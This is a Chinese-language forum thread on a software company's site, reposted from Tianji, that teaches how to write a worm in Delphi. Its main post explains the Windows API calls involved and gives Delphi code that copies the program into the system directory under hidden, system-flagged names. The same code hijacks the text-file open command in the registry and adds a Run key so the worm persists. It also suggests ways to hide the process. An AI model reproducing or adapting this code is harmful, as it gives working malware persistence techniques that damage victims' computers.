加入收藏  免费注册  用户登陆  帮助中心
首页 公司新闻 恒佳商城 网站建设 软件下载 用户中心 技术文栏 在线交流 在线商城 精彩视频 推荐站点 精彩贴图
今天是:2020年08月09日 星期日 您现在位于: 首页在线交流编程相关问题讨论(浏览...
   在线交流  → 软件产品相关讨论区 → 编程相关问题讨论 → 浏览主题
      编程相关问题讨论(浏览主题) 论坛版主 james  [精华]  [事件]  [管理]
 主题:用Delphi来编写蠕虫病毒浅析
向版主报告本贴   显示适合打印的页面   将本页推荐给我的好友   将本页加入收藏夹   刷新本页  
james帅哥,在线哦!有人找吗?
  
  等级:管理员 小虾
  贴子:53
  积分:6006
  E币:12347
  来自:山东临沂
  注册:2006-04-06
查看 james 的详细信息 将 james 加为我的好友 给 james 发短信 编辑这个贴子 引用并回复这个贴子 回复这个贴子 1
 用Delphi来编写蠕虫病毒浅析
可能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。 
  一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.....等就会使目标文件非常的大,所以,在我们的程序里,我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数,比如对文件的操作,对字符串的操作,如果用自己的程序来代替,目标文件会更加的小) 
  首先,我们知道,一个病毒程序一般都分下面三个模块: 
  ①保护模块; 
  ②感染模块; 
  ③发作模块。 
  下面我们就从这三个模块开始,分别实现他们的代码。 
  一)保护模块。 
  一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :
UINT GetSystemDirectory( 
LPTSTR lpBuffer, // 存放返回的字符串的缓冲区 
UINT uSize // 上面的缓冲去的长度 
);  
相关的函数还有GetWindowsDirectory可以得到%windows%的路径 
  得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :
BOOL CopyFile( 
LPCTSTR lpExistingFileName, // 源文件的路径 
LPCTSTR lpNewFileName, // 目标文件的路径 
BOOL bFailIfExists // 这是一个标志,如果目标文件已经存在,是否强制覆盖 
);  
  拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数SetFileAttributes :
BOOL SetFileAttributes( 
LPCTSTR lpFileName, // 需要设置的文件的文件名 
DWORD dwFileAttributes // 设置的值。 
);  
  我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM 
  下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,首先用RegOpenKey函数来打开一个键。
LONG RegOpenKey( 
HKEY hKey, // 主键,比如HKEY_LOCAL_MACHINE 
LPCTSTR lpSubKey, // 跟随的subkey 
PHKEY phkResult // 存放函数返回这个打开的键的句柄 
);  
  得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。 
LONG RegSetvalueEx( 
HKEY hKey, // 这个就是刚才我们得到的句柄 
LPCTSTR lpvalueName, // 键名的地址 
DWORD Reserved, // 一般设置为0 
DWORD dwType, // 我们写的键的类型,字符串为REG_SZ 
CONST BYTE *lpData, // 键值的地址 
DWORD cbData // 写入的键值的长度 
);  
  下面,我综合上面的说明来给出一个简短的例子: 
procedure SelfCopy; 
var 
Path,value:array [0..255] of char; 
Hk:HKEY; 
S:string; 
begin 
GetSystemDirectory(Path,256); 
//取得系统的路径 
s:=strpas(Path); 
//转换成字符串 
CopyFile(pchar(paramstr(0)),pchar(S+‘/ruin.exe‘),false); 
CopyFile(pchar(paramstr(0)),pchar(S+‘/virus_ruin.exe‘),false); 
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe 
SetFileAttributes(pchar(S+‘/ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); 
SetFileAttributes(pchar(S+‘/virus_ruin.exe‘),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM); 
//设置刚才的两个文件为系统和隐藏 
RegOpenKey(HKEY_CLASSES_ROOT,‘txtfile/shell/open/command‘,Hk); 
value:=‘virus_ruin.exe %1‘; 
RegSetvalueEx(Hk,‘‘,0,REG_SZ,@value,17); 
//把virus_ruin.exe和文本文件关联 
RegOpenKey(HKEY_LOCAL_MACHINE,‘Software/Microsoft/Windows/CurrentVersion/Run‘,Hk); 
value:=‘ruin.exe‘; 
RegSetvalueEx(Hk,‘ruin‘,0,REG_SZ,@value,8); 
//设置开机自动运行ruin.exe 
end;  
  我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。 
  不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。 
  如: 
begin 
if paramcount=1 then 
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal); 
//其他的代码  
 这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。
[本帖转自天极网]
 
这个人很懒,没有留下签名
   2008-12-30 17:12
 james 的IP是:222.132.212.10  操作系统: Windows XP,浏览器: Internet Explorer 6.0 
ball2009帅哥,离线了
  
  等级:注册用户 小虾
  贴子:1
  积分:2
  E币:0
  注册:2009-05-30
查看 ball2009 的详细信息 将 ball2009 加为我的好友 给 ball2009 发短信 编辑这个贴子 引用并回复这个贴子 回复这个贴子 2
 
随便看看、
 
   2009-05-30 14:18
 ball2009 的IP是:60.213.81.241  操作系统: Windows XP,浏览器: Internet Explorer 8.0 
本主题回复1贴,浏览6771人次,分页: [1]
 → 快速回复:用Delphi来编写蠕虫病毒浅析
  您是否还没有 注册 或还没有 登陆 本站?!
关于我们网站留言友情链接与我在线管理TOP

页面执行时间:<font class=red>46.875</font> 毫秒<font class=gray>(5次)</font><br>
本站当前有 <font class=red>1</font> 人同时在线<br>
最高峰有 <font class=red title=>540</font> 人同时在线<br>
最高峰发生在:2020-3-9 1:48:21<br>
本站总访问量:<font class=red>2159054</font> 人次<br>
本站统计时间:从 <font class=red>2007-01-01</font> 至今<br>
<font class=gray>网站当前版本:CMS1.2</font>
临沂曙光软件 http://www.softsky.cn/
联系我们:softsky@163.com
Copyright (c) 2005-2016 曙光软件 版权所有 鲁ICP备05030889号
地址:山东临沂华强科技城4楼 电话:0539-2025968 18953979168